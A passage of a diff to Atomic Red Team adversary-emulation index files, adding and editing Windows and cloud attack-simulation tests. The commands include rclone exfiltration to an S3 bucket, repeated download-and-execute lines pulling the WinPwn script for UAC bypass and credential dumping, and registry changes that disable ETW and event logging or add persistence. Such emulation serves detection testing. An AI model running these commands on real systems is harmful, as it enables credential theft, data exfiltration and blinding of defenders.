+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+          Write-Host "Generating rclone config... " -NoNewLine
+          $config = @"
+          [exfils3]
+          type = s3
+          provider = AWS
+          env_auth = true
+          region = #{aws_region}
+          "@
+          $config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
+          Write-Host "Done!"
+          Write-Host "Exfiltrating data... " -NoNewLine
+          $bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
+          cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
+          $null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
+          Write-Host "Done!"
+        cleanup_command: |
+          Write-Host "Destroying AWS infrastructure... " -NoNewLine
+          $awsAccessKey = "#{aws_access_key}"
+          $awsSecretKey = "#{aws_secret_key}"
+          cd PathToAtomicsFolder/T1567.002/src/
+          if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
+            $env:AWS_PROFILE = "#{aws_profile}"
+          } else {
+            $env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
+            $env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
+          }
+          $null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform destroy -var "aws_region=#{aws_region}" -auto-approve
+          Write-Host "Done!"
+        name: powershell
+        elevation_required: false
   T1030:
     technique:
       x_mitre_platforms:

atomics/Indexes/office-365-index.yaml

@@ -9410,11 +9410,11 @@ defense-evasion:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -11698,11 +11698,11 @@ defense-evasion:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'ExchangeOnlineManagement PowerShell module must be installed
@@ -25576,7 +25576,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25628,6 +25628,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -26966,6 +26967,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -27141,6 +27143,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -41363,11 +41366,11 @@ collection:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
         rule_name:
           description: email rule name
           type: string
@@ -41646,23 +41649,23 @@ collection:
             and Application.ReadWrite.All Scope (eg, Global Administrator Role) and
             sign-in method is password
           type: string
-          default: 
+          default:
         password:
           description: Entra user password
           type: string
-          default: 
+          default:
         1st_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
         2nd_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
         3rd_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Microsoft Graph PowerShell SDK must be installed.
@@ -57070,7 +57073,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -57088,6 +57091,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/saas-index.yaml

@@ -25395,7 +25395,7 @@ execution:
   T1059.010:
     technique:
       modified: '2024-04-28T15:58:48.119Z'
-      name: AutoHotKey & AutoIT
+      name: 'Command and Scripting Interpreter: AutoHotKey & AutoIT'
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
@@ -25447,6 +25447,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1059.010
     atomic_tests: []
   T1059.009:
     technique:
@@ -26785,6 +26786,7 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1651
     atomic_tests: []
   T1059.005:
     technique:
@@ -26960,6 +26962,7 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1648
     atomic_tests: []
   T1204.001:
     technique:
@@ -56700,7 +56703,7 @@ reconnaissance:
         privileges and move laterally. "
       modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Wordlist Scanning
+      name: 'Active Scanning: Wordlist Scanning'
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
         of scanning, such as large quantities originating from a single source (especially
         if the source is known to be associated with an adversary/botnet). Monitor
@@ -56718,6 +56721,7 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1595.003
     atomic_tests: []
   T1591.004:
     technique:

atomics/Indexes/windows-index.yaml

@@ -771,7 +771,7 @@ defense-evasion:
           default: "'%windir%\\System32\\calc.exe'"
       executor:
         command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
   T1027.009:
@@ -2401,7 +2401,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
         name: powershell
@@ -2412,7 +2411,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
         name: powershell
@@ -2423,7 +2421,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
         name: powershell
@@ -5188,6 +5185,36 @@ defense-evasion:
           '
         name: command_prompt
         elevation_required: true
+    - name: SubInAcl Execution
+      auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
+      description: This test simulates an adversary executing the Windows Resource
+        kit utility SubInAcl. This utility was abused by adversaries in the past in
+        order to modify access permissions. Upon execution, a process creation log
+        should be generated indicating successful execution.
+      supported_platforms:
+      - windows
+      input_arguments:
+        SubInAclDownloadPath:
+          type: string
+          default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
+          description: Download URL for SubInAcl
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Download subinacl
+
+          '
+        prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
+          Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |-
+          New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
+          Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
+          msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
+      executor:
+        command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
+        name: command_prompt
+        elevation_required: true
   T1574.014:
     technique:
       modified: '2024-04-28T15:44:25.342Z'
@@ -6141,6 +6168,21 @@ defense-evasion:
 
           '
         name: powershell
+    - name: Clear PowerShell Session History
+      auto_generated_guid: 22c779cd-9445-4d3e-a136-f75adbf0315f
+      description: "This technique involves using the Clear-History cmdlet in PowerShell
+        to remove all records of previously executed commands.\nThis action is often
+        performed by attackers to eliminate traces of their activities, making incident
+        detection and forensic \ninvestigation more challenging. By clearing the session
+        history, adversaries aim to obfuscate their operational footprint.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Clear-History
+
+          '
+        name: powershell
+        elevation_required: false
   T1202:
     technique:
       modified: '2024-10-03T14:47:17.154Z'
@@ -6283,7 +6325,7 @@ defense-evasion:
           default: C:\Windows\System32\calc.exe
       executor:
         command: Scriptrunner.exe -appvscript "#{payload_path}"
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Indirect Command Execution - RunMRU Dialog
@@ -8338,7 +8380,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           mimiload -consoleoutput -noninteractive
         name: powershell
@@ -8964,6 +9005,66 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: Modify Event Log Channel Access Permissions via Registry - PowerShell
+      auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
+          description: Path to the event log service channel to alter
+      executor:
+        command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
+          \"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
+          Ignore "
+        cleanup_command: |-
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
+      auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        ChannelPath:
+          type: string
+          default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
+          description: Path to the event log service channel to alter
+      executor:
+        command: |-
+          New-Item -Path #{ChannelPath} -Force
+          Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        cleanup_command: |-
+          Remove-Item -Path #{ChannelPath} -Force
+          Restart-Service -Name EventLog -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Modify Event Log Access Permissions via Registry - PowerShell
+      auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
+      description: |-
+        This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
+        Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+      supported_platforms:
+      - windows
+      input_arguments:
+        CustomSDPath:
+          type: string
+          default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
+          description: Path to the event log service channel to alter
+      executor:
+        command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
+        cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
+        name: powershell
+        elevation_required: true
   T1218.002:
     technique:
       x_mitre_platforms:
@@ -9490,6 +9591,53 @@ defense-evasion:
         cleanup_command: Remove-NetFirewallRule -DisplayName "New rule"
         name: powershell
         elevation_required: true
+    - name: ESXi - Set Firewall to PASS Traffic
+      auto_generated_guid: a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d
+      description: 'This test sets the default ESXi firewall action to PASS instead
+        of DROP. This allows all incoming and outgoing traffic.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli network firewall set --default-action true"
+
+          '
+        cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli network firewall set --default-action false"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1553.003:
     technique:
       x_mitre_platforms:
@@ -13848,6 +13996,63 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
+        - Cmd
+      auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKCU registry using the reg.exe utility.
+        In order for changes to take effect a logout might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+        cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul
+          2>&1
+        name: command_prompt
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry
+        - PowerShell
+      auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKCU registry using PowerShell. In order
+        for changes to take effect a logout might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+          -Value 0 -PropertyType "String" -Force
+        cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
+        name: powershell
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
+        - Cmd
+      auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKLM registry using the reg.exe utility.
+        In order for changes to take effect a reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
+          /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
+        cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry
+        - PowerShell
+      auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
+      description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled
+        environment variable to 0 in the HKLM registry using PowerShell. In order
+        for changes to take effect a reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String"
+          -Force
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session
+          Manager\Environment" -Name COMPlus_ETWEnabled
+        name: powershell
+        elevation_required: true
   T1562.007:
     technique:
       modified: '2024-10-16T19:38:57.374Z'
@@ -14216,7 +14421,7 @@ defense-evasion:
           description: Ticket file name usually format of 'id-username\@domain.kirbi'
             (e.g. can be dumped by "sekurlsa::tickets /export" module)
           type: string
-          default: 
+          default:
         mimikatz_exe:
           description: Path of the Mimikatz binary
           type: path
@@ -14782,6 +14987,7 @@ defense-evasion:
           Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
           Stop-process -name "hello" -Force -ErrorAction ignore
         name: powershell
+        elevation_required: true
     - name: Remove the Zone.Identifier alternate data stream
       auto_generated_guid: 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9
       description: |
@@ -18271,8 +18477,7 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
           -consoleoutput -noninteractive  "
         name: powershell
     - name: Tamper with Windows Defender ATP using Aliases - PowerShell
@@ -18725,6 +18930,81 @@ defense-evasion:
           '
         name: powershell
         elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - Cmd
+      auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the reg.exe utility to
+        update the Windows registry value "Start". This would effectivly disable the
+        Event log application channel. The changes would only take effect after a
+        restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application"
+          /v "Start" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell
+      auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c
+      description: This atomic simulates an activity where an attacker disables the
+        EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty"
+        cmdlet to update the Windows registry value "Start". This would effectivly
+        disable the Event log application channel. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      executor:
+        command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application
+          -Name Start -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - Cmd
+      auto_generated_guid: 1cac9b54-810e-495c-8aac-989e0076583b
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the reg.exe utility to update the Windows registry value "Enabled".
+        This would effectivly remove that provider from the session and cause to not
+        emit any logs of that type. The changes would only take effect after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "0" /f
+        cleanup_command: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          /v "Enabled" /t REG_DWORD /d "1" /f
+        name: command_prompt
+        elevation_required: true
+    - name: Disable EventLog-Application ETW Provider Via Registry - PowerShell
+      auto_generated_guid: 8f907648-1ebf-4276-b0f0-e2678ca474f0
+      description: This atomic simulates an activity where an attacker disables a
+        specific ETW provider from the EventLog-Application ETW Auto Logger session
+        using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry
+        value "Enabled". This would effectivly remove that provider from the session
+        and cause to not emit any logs of that type. The changes would only take effect
+        after a restart.
+      supported_platforms:
+      - windows
+      input_arguments:
+        ETWProviderGUID:
+          type: string
+          default: "{B6D775EF-1436-4FE6-BAD3-9E436319E218}"
+          description: Microsoft-Windows-SenseIR ETW Provider GUID
+      executor:
+        command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 0 -PropertyType "DWord" -Force
+        cleanup_command: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\#{ETWProviderGUID}"
+          -Name Enabled -Value 1 -PropertyType "DWord" -Force
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
@@ -26760,7 +27040,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -26772,7 +27051,6 @@ defense-evasion:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           safedump -consoleoutput -noninteractive
         name: powershell
@@ -29140,7 +29418,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
         name: powershell
@@ -29151,7 +29428,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
         name: powershell
@@ -29162,7 +29438,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
         name: powershell
@@ -36650,11 +36925,11 @@ privilege-escalation:
           default: calc
       executor:
         command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
+          /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
 
           '
         cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"
-          /v StartupPrograms /t REG_SZ /d "rdpclip"
+          /f /v StartupPrograms /t REG_SZ /d "rdpclip"
         name: command_prompt
         elevation_required: true
     - name: Creating Boot Verification Program Key for application execution during
@@ -36676,6 +36951,21 @@ privilege-escalation:
 
           '
         cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
+          /f
+        name: command_prompt
+        elevation_required: true
+    - name: Add persistence via Windows Context Menu
+      auto_generated_guid: de47f4a0-2acb-416d-9a6b-cee584a4c4d1
+      description: |
+        This atomic test add persistence taking advantage of the  Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
+        User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKEY_CLASSES_ROOT\Directory\Background\shell\Size Modify\command"
+          /ve /t REG_SZ /d "C:\Windows\System32\calc.exe" /f
+        cleanup_command: reg delete "HKEY_CLASSES_ROOT\Directory\Background\shell\Size
+          Modify" /f
         name: command_prompt
         elevation_required: true
   T1098:
@@ -41870,7 +42160,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           obfuskittiedump -consoleoutput -noninteractive
         name: powershell
@@ -41882,7 +42171,6 @@ privilege-escalation:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
